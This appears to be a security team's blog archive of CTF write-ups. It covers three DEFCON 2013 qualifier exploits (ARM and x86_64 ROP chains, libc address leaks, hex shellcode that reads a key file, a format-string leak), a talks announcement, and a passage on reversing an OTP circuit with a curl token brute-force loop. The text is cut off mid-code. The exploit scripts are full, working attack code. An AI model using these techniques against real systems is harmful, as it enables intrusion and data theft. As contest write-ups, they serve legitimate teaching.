add r12, 0x8 cmp r12, r13 jbe loop
DEFCON 2013 Quals: Ergab - Exploitation (0x41414141) 3
Score 3 Link http://assets-2013.legitbs.net/liabilities/ergab
This challenge was an ARM binary, our goal was to print the content of a file named “key”. Like the bitterswallow challenge, the first part of the program was not that interesting since it was only doing the setup of the socket and the privileges. However, the program was written in C++ with some objects.
The first thing it does is open a file (questions.txt), read some questions with their answers, and initialize a structure based on them. The format of the file is the following:
5 # the number of questions Question1?;resp1;resp2;resp3;resp4; Question2?;resp1;resp2;resp3;resp4; Question3?;resp1;resp2;resp3;resp4; Question4?;resp1;resp2;resp3;resp4; Question5?;resp1;resp2;resp3;resp4;
The good answer is always the last one of each line.
Then it prints some questions and the answers in a random order. It looks like:
Question? 1) rep2 2) rep4 3) rep1 4) rep3 Answer:
The answer that the program waits is the number followed by a newline.
Once you have given the good answer to 5 questions, the binary receives your name in 0x100 in a buffer of size 0x10. After that it sends us our name back and then asks if we want to play again.
So our first step will be to pass the question. The questions were relative to the Dr Who Series. Here is the code we used to answer them:
import socket import struct import sys, time HOST = 'lolergab.shallweplayaga.me' PORT = 5000 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) def _send(st, end=b''): if isinstance(st, str): st = bytes(st, 'utf-8') st += end print('Send:', repr(st)) return s.send(st) def _recv(l): if isinstance(l, str): l = len(l) r = s.recv(l) if r: print('Recv:', repr(r)) return r def _pack(i): return struct.pack('<I', i) def _unpack(b): return struct.unpack('<I', b)[0] # For passing the questions tab_quest = [] ans_quest = [] tab_quest.append("What is the name of the Doctor's robotic dog?") ans_quest.append("K-9") tab_quest.append("What is the name of the town being guarded by the Gunslinger?") ans_quest.append("Mercy") tab_quest.append("Which planet are the Slitheen from?") ans_quest.append("Raxacoricofallapatorius") tab_quest.append("What do the Daleks call the Doctor on their home planet?") ans_quest.append("The Oncoming Storm") tab_quest.append('What is the name of the last human in "The End of the World"?') ans_quest.append('Cassandra') tab_quest.append("What is the actual name of River Song?") ans_quest.append("Melody Pond") tab_quest.append("Who is the astronaut who kills the Doctor?") ans_quest.append("River Song") tab_quest.append("How many Doctors have there been?") ans_quest.append("11") tab_quest.append("When the Doctor first meets Oswin what has she become?") ans_quest.append("A Dalek") tab_quest.append("Who founded Torchwood?") ans_quest.append("Queen Victoria") tab_quest.append("What company were the Cybermen made by?") ans_quest.append("Cybus Industries") tab_quest.append("What does TARDIS stand for?") ans_quest.append(" Time And Relative Dimension In Space") tab_quest.append("How did the Doctor get the TARDIS?") ans_quest.append("He stole it.") tab_quest.append("What was the monster in the episode 'Blink'?") ans_quest.append("Weeping Angels") def recv_line(): r = "" t = _recv(1) while t != b'\n' : r += str(t, "utf-8") t = _recv(1) return r def get_quest(): q = recv_line() a1 = recv_line() a2 = recv_line() a3 = recv_line() a4 = recv_line() _recv("\nAnswer: ") print("Question:") print(q) return q, a1[3:], a2[3:], a3[3:], a4[3:] def resolve_quest(t): q, a1, a2, a3, a4 = t print(a1, a2, a3, a4) if q in tab_quest: st = ans_quest[tab_quest.index(q)] print(st) if st == a1: _send("1\n") if st == a2: _send("2\n") if st == a3: _send("3\n") if st == a4: _send("4\n") else: t = sys.stdin.readline() _send(t + "\n") recv_line() def pass_quest(): i = 0 while i < 5: resolve_quest(get_quest()) i += 1 _recv("What is your name: ")
The first step of the exploit is to bypass the ASLR by leaking an address. After getting our name the program sends it as a string (it is doing a strlen and then sends the right length back). When looking at our stack we can see that we have two values right after our buffer: the first one is an address on the stack, the second one is the return address of our function.
To get this address, we will send just the good number of characters. The send will hopefully consider this address to be part of the string. When receiving the data we can get the address we will need on our stack and in our binary.
#FIRST part : leak the addr of our buffer and of the addr of return pass_quest() payload = b"a" * 4 payload += b"a" * 4 payload += b"a" * 3 _send(payload + b"\n") _recv("Congrats ") t = _recv("aaaaaaaaaaa\n\xbc\xe5\xd0\xbex\xc6\xf9\xb6>") ADDR_BUF = _unpack(t[12:16]) - 40 # the address of our buffer ADDR_RET_CONGRATS = _unpack(t[16:20]) # the address of return BASE_ASLR = ADDR_RET_CONGRATS - 0x1678 # the base of the mapping for our section print ("addr buf :", hex(ADDR_BUF)) print ("addr ret congrats :", hex(ADDR_RET_CONGRATS)) print ("base ASLR :", hex(BASE_ASLR)) # we receve again a string _recv("Would you like to try again (y/n): ") # we have not done yet _send("y\n")
Now that we have our address we can start leaking the address from the libc to have some useful address and apply the shellcode that we used for the first exercise (See BittersWallow write-up).
To leak the address from the libc we need to send ourselves the data from the got. To do so we need to call some function, we will use some gadgets to do it, the exact same one that we used in BittersWallow.
There was one thing to take care of when we rewrote our stack: putting a valid pointer at the place just before the return address because it was a pointer to a structure which was modified by the function before its own return, if we put something which was not valid the program would segfault.
Here is the code of this second step:
#SECOND part : leek the addr of getpwnam from the libc SOCKET_FD = 4 USELESS = 0 GOT_PWNAM = BASE_ASLR + 0xd224 GADGET_CALL = BASE_ASLR + 0x45fc GADGET_PIVOT = BASE_ASLR + 0x4618 ADDR_SEND_DATA = BASE_ASLR + 0x3cfc ADDR_MAIN_LOOP = BASE_ASLR + 0x1ee8 def _call_func(addr, arg1, arg2, arg3): # 8 pack payload = _pack(addr) # call addr. (r3) payload += _pack(0) # counter loop (r4) payload += b'\x41' * 4 # padding. (r5) payload += _pack(1) # second counter (r6) payload += _pack(arg1) # first arg (r7) payload += _pack(arg2) # second arg (r8) payload += _pack(arg3) # third arg (r10) payload += _pack(GADGET_CALL) # next addr (pc) return payload pass_quest() payload = b"a" * 12 # padding payload += _pack(ADDR_BUF + 40) # the addr of the ifs struct payload += _pack(GADGET_PIVOT) # our first addr the pivot # the call for leak the addr in the libc of PWNAM payload += _call_func(ADDR_SEND_DATA, SOCKET_FD, GOT_PWNAM, 4) # the call for continue to loop and the exploitation payload += _call_func(ADDR_MAIN_LOOP, SOCKET_FD, USELESS, USELESS) _send(payload + b"\n") ADDR_GETPWNAM = _unpack(_recv(4)) print ("addr getpwnam :", hex(ADDR_GETPWNAM))
So we now have the address of
getpwnam
. From the first binary we have a valid shellcode and we have everything we need to trigger it.As we have modified our stack, the address of the buffer we get the first time is not valid anymore. To get the right value we can just redo the first step:
pass_quest() payload = b"a" * 4 payload += b"a" * 4 payload += b"a" * 3 _send(payload + b"\n") _recv("Congrats ") t = _recv("aaaaaaaaaaa\n\xbc\xe5\xd0\xbex\xc6\xf9\xb6>") ADDR_BUF = _unpack(t[12:16]) - 40 _recv("Would you like to try again (y/n): ") _send("y\n")
Now we have to exploit, the goal being to first allocate a page (we will call mmap) then we will read to receive the shellcode and put it into the page, and finally we will call that page.
We need two more gadgets to do it: one of this gadget is a simple pop and the other is the syscall itself, this gadget and the way we find the offsets are explained in the bitterswallow write-up. The shellcode does the following :
fd = open("key"); read(fd, addr_in_stack, 255); write(socket_fd, addr_in_stack, 255);
Here is the code for calling the shellcode:
pass_quest() shc = '0f00a0e1400080e20010a0e30570a0e3000000ef01dc4de201dc4de20d10a0e1ff20' shc += 'a0e30370a0e3000000ef0400a0e30d10a0e1ff20a0e30470a0e3000000ef01dc8d' shc += 'e201dc8de26b65790000000000' shellcode = bytes.fromhex(shc) ADDR_MMAP_BUF = 0x13371000 MMAP_SYSCALL = 192 OFFSET_SYSCALL, OFFSET_GADGET = 428, 324 payload = b"a" * 12 # padding payload += _pack(ADDR_BUF + 40) # the addr of the struct payload += _pack(GADGET_PIVOT) # the first return # setting everything for the syscall payload += _call_func(GADGET_PIVOT, ADDR_MMAP_BUF, 4096, 7) payload += _pack(0x32) * 4 payload += _pack(MMAP_SYSCALL) payload += _pack(0x32) * 2 payload += _pack(ADDR_GETPWNAM + OFFSET_SYSCALL) # the addr of the syscall payload += _pack(0) * 13 # padding for the pop after the syscall payload += _pack(GADGET_PIVOT) # return for pushing some argument # call the recv for our shellcode payload += _call_func(ADDR_RECV_DATA, SOCKET_FD, ADDR_MMAP_BUF, len(shellcode)) # call our shellcode payload += _call_func(ADDR_MMAP_BUF, 0, 0, 0) _send(payload + b"\n") # send the shellcode input("ShellCode?") _send(shellcode + b"\n") # recv the result while len(_recv(1024)) == 1024 : pass while len(_recv(1024)) == 1024 : pass
For this challenge we had a lot of hard work already done for the previous challenge, but it was different and we had an interesting way of leaking the address.
DEFCON 2013 Quals: BittersWallow - Exploitation (0x41414141) 1
Score 1 Link http://assets-2013.legitbs.net/liabilities/bs
This binary was compiled for the ARM architecture, and our goal was to exploit it to get the “key” file on the remote server. The first part of the binary does the setup of all the common things found in pwnables, including:
- opening a socket
- identifying itself as a pre-define user (bitterswallow)
- dropping privileges
The interesting part comes after, in a function called
ff
. The first thing it does is send some text:Welcome to the sums. Are you ready? (y/n):
And wait for an answer. It then compares it to ‘y’ or ‘Y’. If the answer is different it simply closes the connection. Once this is done we enter a loop where two functions are called.
The first one waits for an input of one byte and then goes into a big switch according to this byte. All the cases but one come back to the same point (
0xa114
) where it waits for another user input which is the length of a future message. The length sent can’t be over 0x400. The particular case, triggered with value0x1a
, doesn’t check this and doesn’t even ask for any length.The pseudo C code for this function is :
int get_meta(int fd, int *input, int *value_get) { int choice; int value; long long int size; if (!input || !value_get || !recvdata(fd, &choice, 1)) return 0; *input = choice; switch (choice & 0x3f) { case 0: value = 0x32444d; // Some value? break; // ... case 0x1a: goto last; // ... default: break; } if (!recvdata(fd, &size, 2)) return 0; if (size > 0x400) size = 0x400; last: size = (size << 16) >> 16; *value_get = value; return size; }
Then a second function is called. It receives data of the size returned by the first one in a buffer of
0x400
, and then computes a hash (depending on the values chosen in the first function), except for the case0x1a
which doesn’t compute the hash. It then sends this hash and asks if we want do all the loop again.Here is the pseudo C code for this function :
int compute(int fd, int size, int input, int value_get) { int res_recv; char buf[0x400]; char buf_hash[0x40]; memset(buf, 0, 0x400); memset(buf_hash, 0, 0x40); printf("%x %x %x\n", size, input, value_get); recvdata(fd, buf, size); switch (input & 0x3f) { case 0 : res_recv = ... hash(buf, size, buf_hash); break; ... case 0x1a : res_recv = 0; break; ... default: break; } send_data(fd, buf_hash, res_recv); send_string(fd, "Would you like to sum another? (y/n): "); recvdata(fd, &res_recv, 1); if (res_recv == 'y' || res_recv == 'Y') return 1; else return 0; }
In the caller of this function the loop will continue or it will stop. To exploit this function the goal is to change the size that returns the first function being used with the second one. Since the
case 0x1a
doesn’t do any check, we will use it to return the false size and then rewrite our stack to use Return-Oriented-Programming.To rewrite the size we can use the second function that writes on the same part of the stack, the content of size is in the same place than the end of the hash buffer.
So we need to:
- do a normal computation that rewrites something at the place of size
- do another iteration with the choice 0x1a and rewrite all our stack.
One of the problems that we need to take care of is not to have a value which is too big because we risk to rewrite all of our stack which can make our exploit fail.
_recv("Welcome to the sums.\n") _recv("Are you ready? (y/n): ") _send("y") _send(b"\x32") # case 50 : sha512 _send(b"\x00\x03") # send a size _send("x" * 0x300) # send a value, with this we have a size of 0x7b3 while len(_recv(1024)) == 1024: # pass all the writing pass _send("y") # say yes to do an other one _send(b"\x1a") # case 0x1a : doesn't check the size # Here we can send the data for rewritting our stack
At this point we can rewrite our stack but we don’t have any address from the libc so we can’t do a lot of things. There is no syscall in the binary so we can’t do anything with full ROP yet.
The first thing to do is to leak some information on the libc, like an address from the GOT which gives us the information on where libc is mapped. We chose to leak the address of
getpwnam
(but any other function could work).To leak the address of
getpwnam
we needed to call thesend_data
function (0x1d9fc
) on the position of the entry forgetpwnam
in the GOT. The first arguments of a function in ARM are given through the registers r0, r1, r2 and R3, so we needed some gadget that takes values from the stack and puts them in the registers that we need. The gadget we used to do this is in__libc_csu_init
:loc_1E3C4 LDR R3, [R5], #4 MOV R0, R6 ; loc_1E3C8 MOV R1, R7 MOV R2, R8 ADD R4, R4, #1 BLX R3 CMP R4, R10 BNE loc_1E3C4 loc_1E3E4: LDMFD SP!, {R3-R8, R10, PC}
If we go to
0x1e3e4
we can put values in registers from r3 to r8, r10 and chose the position of return from our stack. In0x1e3c8
we can copy the values from r6 to r8 in r0 to r2 (our first arguments) and then call the function stored in r3 and if we put the good value in r4 and r10 we will have our first gadget again. Note that if we need to make a call with some values in registers like r3 (something other than the function address), we can call our first gadget and have these values in the stack too (useful to call mmap).So we now have everything we need to leak the address from the
libc
. Here is the code we used to do so:import struct import socket import sys HOST = 'bitterswallow.shallweplayaga.me' PORT = 6492 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) def _send(st, end=b''): if isinstance(st, str): st = bytes(st, 'utf-8') st += end print('Send:', repr(st)) return s.send(st) def _recv(l): if isinstance(l, str): l = len(l) r = s.recv(l) if r: print('Recv:', repr(r)) return r def _pack(i): return struct.pack('<I', i) def _unpack(b): return struct.unpack('<I', b)[0] PIVOT_ADDR = 0x1e3e4 PIVOT2_ADDR = 0x1e3c8 SENDDATA_ADDR = 0x1d9fc FF_ADDR = 0x8dfc GETPWNAM_GOT_ADDR = 0x27114 SOCKET_FD = 4 USELESS = 0x46474849 # length of 8 int def _call_func(addr, arg1, arg2, arg3): payload = _pack(addr) # call addr. payload += _pack(0) # counter loop (r4) payload += b'\x41' * 4 # padding. payload += _pack(arg1) # first arg (r6) (fd) payload += _pack(arg2) # second arg (r7) (data) payload += _pack(arg3) # third arg (r8) (length) payload += _pack(1) # counter higher stone. (r10) payload += _pack(PIVOT2_ADDR) # next addr (pc) return payload def _send_bof(payload): p = b"a" * 0x440 p += _pack(0x41424344) p += _pack(PIVOT_ADDR) p += payload p += b'y' * (0x7b3 - len(p)) # 0xe70 _send(p) def pass_menu(): _recv("Welcome to the sums.\n") _recv("Are you ready? (y/n): ") _send("y") _send(b"\x32") # case 50 : sha512 _send(b"\x00\x03") # send a size _send("x" * 0x300) # send a value, with this we have a size of 0x7b3 while len(_recv(1024)) == 1024: # pass all the writing pass _send("y") # say yes to do an other one _send(b"\x1a") # case 0x1a : doesn't check the size input('Ready?') # Stage 1: pass_menu() # we get pass the menu payload = _call_func(SENDDATA_ADDR, SOCKET_FD, GETPWNAM_GOT_ADDR, 40) payload += _call_func(FF_ADDR, SOCKET_FD, USELESS, USELESS) _send_bof(payload) #we send our payload _send("y") # we send this because we need a flush addrs = _recv(38) addrs = _recv(40) addrs = _recv(40) # the four first char are the address of getpwnam in the libc
Now that we have the address of
getpwnam
, we can leak information from the libc.At this point you have two possibilities: you can leak all the libc, compute the offset of a function compared to the address of
getpwnam
and call it (ret2libc). The other possibility is to leak part of the libc and find some gadgets in there to finish the exploitation with full ROP. We chose to try and search syscalls in the libc, so the second option.When leaking the instructions from the libc we look for one particular instruction : a syscall (svc 0, opcode
0x000000ef
)We find this instruction in
getpwnam
implementation: the syscall was at the offset 428. (This offset changes depending on your libc so you should recompute them if you are not using the exact same libc). The gadget for the syscall is:SVC 0 B loc_AAA loc_AAA: LDR R0, [SP, 0x14] ADD SP, SP, 0x18 LDMFD SP!, {R4-R10, PC}
The gadget for the pop is :
LDMFD SP!, {R4-R10, PC}
In order to leak the offset we use the following code :
pass_menu() print("Addr: ", addrs) payload = _call_func(SENDDATA_ADDR, SOCKET_FD, _unpack(addrs[:4]), 4096) payload += _call_func(FF_ADDR, SOCKET_FD, USELESS, USELESS) _send_bof(payload) _send("y") while len(_recv(1024)) == 1024: pass while len(_recv(1024)) == 1024: pass CHUNK = 1024 r = _recv(CHUNK) res = r while len(r) == CHUNK: r = _recv(CHUNK) res += r _send('y') while len(r) == CHUNK: r = _recv(CHUNK) res += r _send('y') while len(r) == CHUNK: r = _recv(CHUNK) res += r print(' RES:', res[:12]) for i in range(len(res) // 4): opcode = _unpack(res[i * 4:(i + 1) * 4]) if opcode == 0xef000000: # looking for the syscall print('Found syscall opcode at offset:', i * 4) print('Buff:', res[i * 4:(i + 5) * 4]) _send("y") while len(_recv(1024)) == 1024: pass _send("y") while len(_recv(1024)) == 1024: pass
Now that we have the offset of our gadget we can ROP. Our goal is to call
mmap
and then to read from our input into the allocated page and finally to execute it.The following code will do that :
MMAP_BUF_ADDR = 0x13371000 MMAP_SYSCALL = 192 READ_SYSCALL = 3 OFFSET = 428 GETPWNAM_ADDR = _unpack(addrs[:4]) print('getpwnam addr:', hex(GETPWNAM_ADDR)) pass_menu() # jump to pivot addr and put some stuf in the register for the syscall payload = _call_func(PIVOT_ADDR, MMAP_BUF_ADDR, 4096, 7) payload += _pack(0x32) # some flag payload += _pack(0x41424344) * 3 # padding payload += _pack(MMAP_SYSCALL) # the number of the syscall is in r7 payload += _pack(0x41424344) * 2 #padding payload += _pack(GETPWNAM_ADDR + OFFSET) # addr of the syscall payload += _pack(0xffffffff) # padding payload += _pack(0) * 12 # padding payload += _pack(PIVOT_ADDR) # return addr # pushing again for an other syscall payload += _call_func(PIVOT_ADDR, SOCKET_FD, MMAP_BUF_ADDR, 4096) payload += _pack(0x41424344) * 4 # padding payload += _pack(READ_SYSCALL) # the number of the syscall payload += _pack(0x41424344) * 2 # padding payload += _pack(GETPWNAM_ADDR + OFFSET) # addr of the syscall gadget payload += _pack(0) * 13 # padding payload += _pack(MMAP_BUF_ADDR) # the last return to our shellcode _send_bof(payload) _recv(1024) _send('y') _recv(1024)
At this point we only needed to send it the shellcode. We wrote one that was pretty simple :
- open the file “key”.
- read its content.
- write the buffer read on the socket.
Here is the final code for sending the shellcode and recv the result :
# sending shellcode. # fd = open("key"); read(fd, addr_in_stack, 255); write(socket_fd, addr_in_stack, 255); shellcode = '0f00a0e1400080e20010a0e30570a0e3000000ef01dc4de201dc4de20d10a' shellcode += '0e1ff20a0e30370a0e3000000ef0400a0e30d10a0e1ff20a0e30470a0e30' shellcode += '00000ef01dc8de201dc8de26b65790000000000' _send(bytes.fromhex(shellcode)) while _recv(1024): pass
You can find the complete exploit here.
DEFCON 2013 Quals: Annyong - Exploitation (0x41414141) 4
Score 4 Link http://assets-2013.legitbs.net/liabilities/annyong
This binary was an elf64 stripped for x86_64, the goal was to exploit and get a shell on the remote server.
The code was quite explicit. We have a buffer of 0x80c bytes and a variable on 4 bytes (an int) which was set to 0. The program has one loop: it checks that the variable is set to 0, then it reads on the standard input for 0x900 bytes and puts it in the buffer, then it checks if it has found the character ‘n’ in the string. If it has, it prints an error message and continues, else it does a
printf
of the buffer, flushes and continues.Here is the equivalent C code:
void loop() { char[0x80c] buf; int fake_cannary = 0; while (!fake_can) { if (!fgets(buf, 0x900, stdin)) break; if (strchr(buf, 'n')) puts("I don't think so..."); else printf(buf); fflush(stdout); } }
In this code, we have two obvious problems. The first one is the
printf
: we can leak the stack from this call, but we can’t use ‘%n’ to rewrite something. On the other hand we have a buffer overflow of almost 0x100 (256), that we can use to rewrite a good part of our stack to use ROP and then ret2Libc.We need to exploit this binary to be able to leak information about known addresses that will allow us to have the information on the position of other functions and in a second stage we will need to rewrite our stack to execute the code we want.
For the first part we will use the call to
printf
, we will use ‘%llx’ to print 64 bits from the stack. To leak some precise part of our stack we can use the ‘$’ to have directly the arg we want.So let’s do the first step, we can loop at what we have on the stack with our
printf
:%261$llx | %262$llx | %263$llx | %264$llx | %265$llx | %266$llx | %267$llx | %268$llx | %269$llx | %270$llx 0 | 555555555130 | 55554c60 | 7fffffffe9e0 | 555555555127 | 0 | 7ffff7a4fa15 | 0 | 7fffffffeac8 | 100000000
When looking in
gdb
we can see :$ x/i 0x7ffff7a4fa15 0x7ffff7a4fa15 <__libc_start_main+245>: mov %eax,%edi
When you look a little more you see that this address is the address of return from our main. So we have actually an address in the libc. So we can now have the address we want from the libc, by calculating the offset between the functions’ codes. We knew that the distant machine uses Ubuntu, so we checked the offset in a corresponding libc.
Now that we have one address in the libc we can try to call “system”. To do so, we need to have an address in memory that we know and where we can write the command to give to system. The simplest way to do that is probably to leak the address of our buffer. Since its address is given on the stack to the
printf
function, it should be at the beginning of our stack:%4$llx 7fffffffe1c0 (gdb) x/s 0x7fffffffe1c0 0x7fffffffe1c0: "%4$llx\n"
So we now have all the information that we need to call system. The last problem we face is the calling convention in x86_64, which is like in ARM, through registers: rdi, rsi, rdx, rcx, r8, r9. So we needed a gadget to extract our arguments from the stack.
The first gadget we are interested in is in
__libc_csu_init
(0x11b8
):mov rbx, [rsp+0x08] mov rbp, [rsp+0x10] mov r12, [rsp+0x18] mov r13, [rsp+0x20] mov r14, [rsp+0x28] mov r15, [rsp+0x30] add rsp, 0x38 retn
This gadget takes a lot of values from the stack and puts them in some registers. Now we need to move the values from this registers to the ones we are interest in, so we need an other gadget, and we can still find it in
__libc_csu_init
at0x1180
, just before the previous one:loc_1180: mov rdx, r15 mov rsi, r14 mov edi, r13d call qword ptr [r12 + rbx * 8] add rbx, 1 cmp rbx, rbp jnz short loc_1180
So we now have something that looks good: we can take the values from our stack and put them in the registers we need. We just have one last problem: we move the value in edi, not in rdi and so the address of the buffer we will give to system will not be good and our call will not work.
So we need a last gadget to put the address of our buffer in rdi. We can find it at 0x1086:
mov rdi, rsi retn
Now we have all the gadgets we need we still have to find the address, for that we need to leak one address in our program. When we have leak before we see that at
%262$llx
we have0x555555555130
, so in gdb:(gdb) x/i 0x555555555130 0x555555555130 <__libc_csu_init>: mov %rbp,-0x28(%rsp)
So we have a point in our binary from which we can calculate the offset for our gadgets.
So now we have all our exploit, here is the code we wrote:
import socket import struct HOST = 'annyong.shallweplayaga.me' PORT = 5679 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) def _send(st, end=b''): if isinstance(st, str): st = bytes(st, 'utf-8') st += end print('Send:', repr(st)) return s.send(st) def _recv(l): if isinstance(l, str): l = len(l) r = s.recv(l) if r: print('Recv:', repr(r)) return r def _pack(i): return struct.pack('<Q', i) def _unpack(b): return struct.unpack('<Q', b)[0] # Offset between the return of the main and the begin of system OFFSET_RETMAIN_SYSTEM = 147187 input("Ready?") # Here we get the address of the return of our main in the libc _send("%267$llx| \n") t = str(_recv(1024)) ADDR_RETMAIN = int("0x" + (t.split("|"))[0][2:], 16) # We calculate the address of the begin of system ADDR_SYSTEM = ADDR_RETMAIN + OFFSET_RETMAIN_SYSTEM print("Addr retmain: ", hex(ADDR_RETMAIN)) print("Addr system: ", hex(ADDR_SYSTEM)) # We leak the address of our buffer _send("%4$llx|\n") t = str(_recv(1024)) ADDR_BUF = int("0x" + (t.split("|"))[0][2:], 16) print("Addr buf: ", hex(ADDR_BUF)) # We leak the address of __libc_csu_init _send("%261$llx|\n") t = str(_recv(1024)) ADDR_CSU_INIT = int("0x" + (t.split("|"))[0][2:], 16) print ("Addr csu init: ", hex(ADDR_CSU_INIT)) # We compute the address for each gadget ADDR_PIVO_ARG = ADDR_CSU_INIT + 0x66 # first gadget ADDR_GADJ_CALL = ADDR_CSU_INIT + 0x50 # second gadget ADDR_GADJ_RDI = ADDR_CSU_INIT - 170 # third gadget ADDR_LOOP_PRINC = ADDR_CSU_INIT - 164 # the address of the loop st = b"cat home/fmtstr/key \x00" # here is our command si = len (st) st += _pack(ADDR_GADJ_RDI) # we put the address in our buffer st += b" " * (0x810 - len(st)) # padding for finishing the buffer st += b"a" * 8 st += _pack(ADDR_PIVO_ARG) # we return here st += _pack(0) # padding st += _pack(0) # rbx st += _pack(1) # for the counter (rbp) st += _pack(ADDR_BUF + si) # addr to the addr to call (r12) st += _pack(0) # first arg (r13) # we put nothing in here it's useless st += _pack(ADDR_BUF) # second arg (r14) # it will be put in rsi and then in rdi for the call. st += _pack(0) # third arg (r15) st += _pack(ADDR_GADJ_CALL) # gadget call, the return from our first gadget # here we are back from our second and third gadget, so rdi point on our buffer st += _pack(1) # padding st += _pack(2) # rbx st += _pack(ADDR_BUF) # for the counter (rbp) st += _pack(4) # addr to call (r12) st += _pack(5) # first arg (r13) st += _pack(6) # second arg (r14) st += _pack(7) # third arg (r15) st += _pack(ADDR_SYSTEM) # Here is our return st += _pack(ADDR_LOOP_PRINC) # return to the main loop st += _pack(ADDR_LOOP_PRINC) # return to the main loop st += b"\n" _send(st) while len(_recv(1024)) == 1024: pass _recv(1024)
Since we could execute any command with this exploit, we first had to find where the key file was and then we got it with
cat home/fmtstr/key
.The vulnerability in this challenge was quite obvious but it was interesting to bypass some common protections while exploiting it.
LSE Week 2013 announcement
For the third year, we are going to give 3 days of talks to show the work we are doing here at the LSE, about various themes we like, have encoutered or seems to be interesing.
We have scheduled this 3 days for July 16 to July 18, from 10:00am to 05:00pm.
This year, we are also openning the talks to external contributors, and all the LSE members, present or past.
All the talks will be in French and as usual we will try to record everything.
If you want to talk or come, you can follow all the informations about this summer week on its dedicated page.
NDH2K13 misc400 writeup: OMG, electronics…
Found some information about what seems to be an OTP. And a webpage asking
for a valid token. The design draft we retrieved looks terrible, they must have got it fixed, yet the algorithm should be similar. Score 400 Link http://z0b.nuitduhack.com:8001/
The goal of this exercise was to understand the given electronic schematic of a One-time-password generator. This device generates new unique passwords at a fixed time interval. Two tokens were also given as part of the challenge’s instructions, with the time they were generated so the goal was to get the algorithm used by the device to generate a new token from the previous one, to find the generation frequency and so to deduce what the token is at the current time.
We translated the diagram into a python script to easily generate as many token as we wanted.
Okay, so let’s break down this circuit, it’s not that complicated, the tokens are just 32 bits long.
The first part, in yellow simply stores the token that is currently displayed by the device in eight differents 4-bits flip-flops. It is important to note, as written on the diagram, that the 7-segments display negates its input before displaying it, so the wire at the top of the diagram is the complement of the token. The wires that go to the pink block (a0-a31) are the token itself.
The next block, the pink one, uses the previous token to compute the address of the byte sent to the next block. The selector, on the right, extracts four by four the token bytes, which will be xored with the value of a simple counter.
def compute_addr_from_previous_token(previous_token): """The Pink Block Return in order the list of computed addresses from the previous token """ addrs = [] for count in range(8): #Extract the 4 lowest bytes of the token v = previous_token & 0xf previous_token >>= 4 #Xor with the counter value addr = v ^ count addrs.append(addr) assert previous_token == 0 return addrs
The generated address is then used, in the blue block, to read the seed value (also given in the instructions) at the computed offset, one byte at a time. This byte is then stored in two of the 4-bits flip-flops in the orange block, either in the two flip-flops at the top of the block or at the bottom, every two cycles. These two bytes are xored together, after their 4 higher bits were complemented.
# From the instructions seed = "025EF87E7819E3A3B48E92CD92E7AB35" def extract_from_eeprom(addr): if addr > 15: raise ValueError("SEED BAD ADDR : {0}".format(addr)) data = seed[addr * 2 : (addr + 1) * 2].decode('hex') return ord(data) def get_eeprom_value_from_addr(addrs): """The blue Block""" values = [] for addr in addrs: values.append(extract_from_eeprom(addr)) return values def compute_2byte(b1, b2): """The Orange Block""" v1 = (b1 & 0xf) | ((0xff ^ b1) & 0xf0) v2 = (b2 & 0xf) | ((0xff ^ b2) & 0xf0) return v1 ^ v2
This new value is stored in the green block in four groups of two 4-bits flip-flops, and the previous operation is repeated four times to compute a final 4-bytes value.
def stock_intermediate_state(values): """The green block: stocks 4 bytes and use it as a Dword after. Translated by taking a list of 4 bytes and outputing the complement as an int.""" result = 0 #Low byte is first for v in reversed(values): result = (result << 8) + v return 0xffffffff ^ result
The complemented value of the token is xored with the complement of this new value. This result is rotated by one to the right (rotation that we didn’t see for our first implementation, despite the fact that it was clearly written at the top…), stored in the yellow block as seen a the top of the article and displayed.
def apply_xor_with_previous(previous_token, interm_dword): """ The red block: Xor the internal DWORD with: NOT previous_token and rotate 1 the result """ not_previous_token = 0xffffffff ^ previous_token xored = not_previous_token ^ interm_dword #Rotation rot = (xored & 0x80000000) if rot: rot = 1 new_token = ((xored << 1) & 0xffffffff) | rot return new_token
The final code is available at the bottom of the article.
Now that we had our algorithm in Python, with the reference tokens given in the instructions, we could compute any token we wanted. We computed the number of tokens that separated the two given tokens and thus could find the index of the token at any given date after the first given token.
We used WolframAlpha to avoid messing-up timezones and timedeltas (we were traumatized by Codegate…) for the time computation. We computed the token at the index we thought but it didn’t work, then tried the 5 tokens below and above it but it didn’t work either. Okay, maybe they screwed the timezone, try the tokens one hour before and after, nope. Okay, you know what? screw this, compute 100 values before and 100 after the tokens and:
for tok in `python2 elec.py | tail -200 | cut -d '-' -f 2`; do curl "http://z0b.nuitduhack.com:8001/?token=$tok" | grep 'Wrong token.' if [ "$?" -eq 1 ]; then echo FOUUUUUND: $tok; break; fi done
And it worked, so I guessed we made a mistake in our computations of time-deltas.
#!/usr/bin/python2 seed = "025EF87E7819E3A3B48E92CD92E7AB35" previous_token = 0x0FDE45E3 def extract_from_eeprom(addr): if addr > 15: raise ValueError("SEED BAD ADDR : {0}".format(addr)) data = seed[addr * 2 : (addr + 1) * 2].decode('hex') return ord(data) def get_eeprom_value_from_addr(addrs): """The blue block""" values = [] for addr in addrs: values.append(extract_from_eeprom(addr)) return values def compute_2byte(b1, b2): """The orange block""" v1 = (b1 & 0xf) | ((0xff ^ b1) & 0xf0) v2 = (b2 & 0xf) | ((0xff ^ b2) & 0xf0) return v1 ^ v2 def compute_addr_from_previous_token(previous_token): """The pink block Returns in order the list of computed addresses from the previous token """ addrs = [] for count in range(8): #Extract the 4 lowest bytes of the token v = previous_token & 0xf previous_token >>= 4 #Xor with the counter value addr = v ^ count addrs.append(addr) assert previous_token == 0 return addrs def stock_intermediate_state(values): """The green block: stocks 4 bytes and use it as a Dword after. Translated by taking a list of 4 bytes and outputing the complement as an int.""" result = 0 #Low byte is first for v in reversed(values): result = (result << 8) + v return 0xffffffff ^ result def apply_xor_with_previous(previous_token, interm_dword): """ The red block: Xor the internal DWORD with: NOT previous_token and rotate 1 the result """ not_previous_token = 0xffffffff ^ previous_token xored = not_previous_token ^ interm_dword #Rotation rot = (xored & 0x80000000) if rot: rot = 1 new_token = ((xored << 1) & 0xffffffff) | rot return new_token def next_token(previous_token): #Addrs computed by pink part addrs = compute_addr_from_previous_token(previous_token) #Send addr to the eeprom values = get_eeprom_value_from_addr(addrs) #The Orange part take bytes 2-by-2 and outpur just one byte interm_byte = [] for i in range(4): v1, v2 = values[i * 2 : (i + 1) * 2] interm_byte.append(compute_2byte(v1, v2)) #The green block just stock intermediate computed byte #and NOT 